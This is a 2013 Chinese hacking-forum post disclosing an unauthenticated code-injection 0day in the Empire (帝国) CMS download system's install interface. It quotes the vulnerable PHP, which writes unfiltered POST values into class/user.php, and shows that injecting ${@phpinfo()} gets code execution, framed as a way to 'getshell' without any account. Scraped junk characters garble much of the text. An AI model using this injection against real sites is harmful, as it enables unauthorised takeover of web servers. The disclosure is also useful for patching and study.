找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2431|回复: 0
打印 上一主题 下一主题

帝国万能接口漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-23 09:34:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们
  c% q  w8 k0 ?; y; n6 S5 ~9 L
& H- y! m& B+ v# e

, H( \5 w* r; n* i6 T0 o: p
这是帝国的一套下载系统 如图+ Y' r1 k. r  D
ps(不需要任何账户和密码,直接写shell)

" x8 |8 h4 t! {! n

由于很多站是由于下载要整合discuz 等等一些论坛....7 y8 I( [1 H& l7 t  x& N6 L- \8 I

6 W8 T$ y) Q3 E5 {

而帝国他又有一个万能接口,如图

9 g; B! Z- \- G

2 H3 |8 u0 w) P# l
2 j5 Z3 I0 X9 P* @

而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码$ F. d& w. w9 g4 P0 v
! Q; _1 n( |' Z5 N3 |" j% g
当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig

1. if($_GET['install']==1)
2. {
3. @include("../class/connect.php");
4. @include("../class/db_sql.php");
5. @include("../class/functions.php");
6. $link=db_connect();
7. $empire=new mysqlquery();
8. if($setup=="SetConfig")
9. {
10. SetUserCOMConfig($_POST);
11. }
12. elseif($setup=="alter")
13. {
14. InstallUserCOM();
15. }
16. elseif($setup=="update")
17. {
18. UpdateUserCOM();
19. }
20. else
21. {}

复制代码

他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪, U2 `+ u7 Y2 Q) L9 R1 X! Q
8 \5 w: O: J) k' K. ^
在data/fun.php中的15行6 M+ j5 O' d# G7 s: D) B2 `

# ]8 r7 |# ?: k+ J$ g; [  ]我们可以看到这个函数

1. function SetUserCOMConfig($add){
2. $filetext=ReadFiletext('data/user.php');
3. if(empty($filetext))
4. {
5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.');
6. }
7. $vr=explode(",",ReturnRepUserVar());
8. $count=count($vr);
9. for($i=0;$i<$count;$i++)
10. {
11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
12. }
13. //写入配置文件
14. $fp=@fopen("../class/user.php","w");
15. if(!$fp)
16. {9 H; J& I- q! b; ?; F, ?  d
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.');
18. }
19. @fputs($fp,$filetext);
20. @fclose($fp);

复制代码

.....//省略若干, }1 S! {6 d' s1 Y

4 e* O+ p: R# b6 L' P) C+ ?这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);0 P+ b+ f' l: r5 r' U, l0 g; I8 T

1 y$ u5 f% K3 n4 O; Y他将传进来的变量进行了切割,然后赋给了$filetext5 p0 K) c6 ^% h! x9 x
4 I" e% r: o) D$ l9 z# e$ m0 R
然后看下面

1. //写入配置文件
2. $fp=@fopen("../class/user.php","w");
3. if(!$fp)
4. {
5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.');
6. }
7. @fputs($fp,$filetext);

复制代码

打开了一个class/user.php文件,然后将$filetext写入了( C( c9 i% L" D) b  P

! q' `2 o* E: ]5 J& O" t% }我们看看写入的结果,随便填一个


7 @. F% e4 A4 K& e) K0 S4 _: ^4 I' U  x! Q

9 b8 v+ z3 ^) O8 \3 ], a+ G# Y9 \4 G5 Z0 R9 W3 V. }7 N, ^
' w1 b" X7 s6 ]3 V

5 ?5 _8 S# u9 A/ D3 f: m, P- Z9 q; L  B5 t+ p- |1 d; U8 {7 A

! G, o  i" R. h+ I0 b6 z
! R9 A; N* G) z# }* t/ ?1 h* A
7 I: f8 m( s, E. }" e

7 O  W, `( m3 Q: F# c5 V
* i+ a" _, e/ l1 q! p3 v$ N
" H8 Y1 w  B) p1 _" Z3 i: M$ B! z' Y0 a' G

. ~! }; ~; h, \0 _
3 l3 B/ a' N) z: J6 [  A: E9 U
) L3 i% e6 ~% F( ?$ l6 o4 M9 _0 {6 L9 _+ n' r, u5 W: {
3 _9 v/ Y; `9 G- W2 O6 `) s/ W9 d

4 O1 d% Q; Y' T. k" p( l: v
3 @4 Q' ^+ I- X

% s0 g2 d1 }% F

所以我们淫荡点,写个${@phpinfo()}试试

# x" s! Q6 e$ f: \' R$ h; @' N2 W

然后访问以下class/user.php这个文件2 X( D# U$ [  t& C2 P/ k7 Q
日了吧


  C" {2 {- @4 J. u( Q/ F

6 T. K6 V1 k- b  i- R+ u1 r

- a* o( W5 E: |5 f( }* G. W
- N& z1 b* p( O5 R4 V: x( g, G+ M

6 B; x0 b, `/ r* W1 F+ }  W# X- p4 R
. M, h$ E4 {. B; X# Q9 K

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表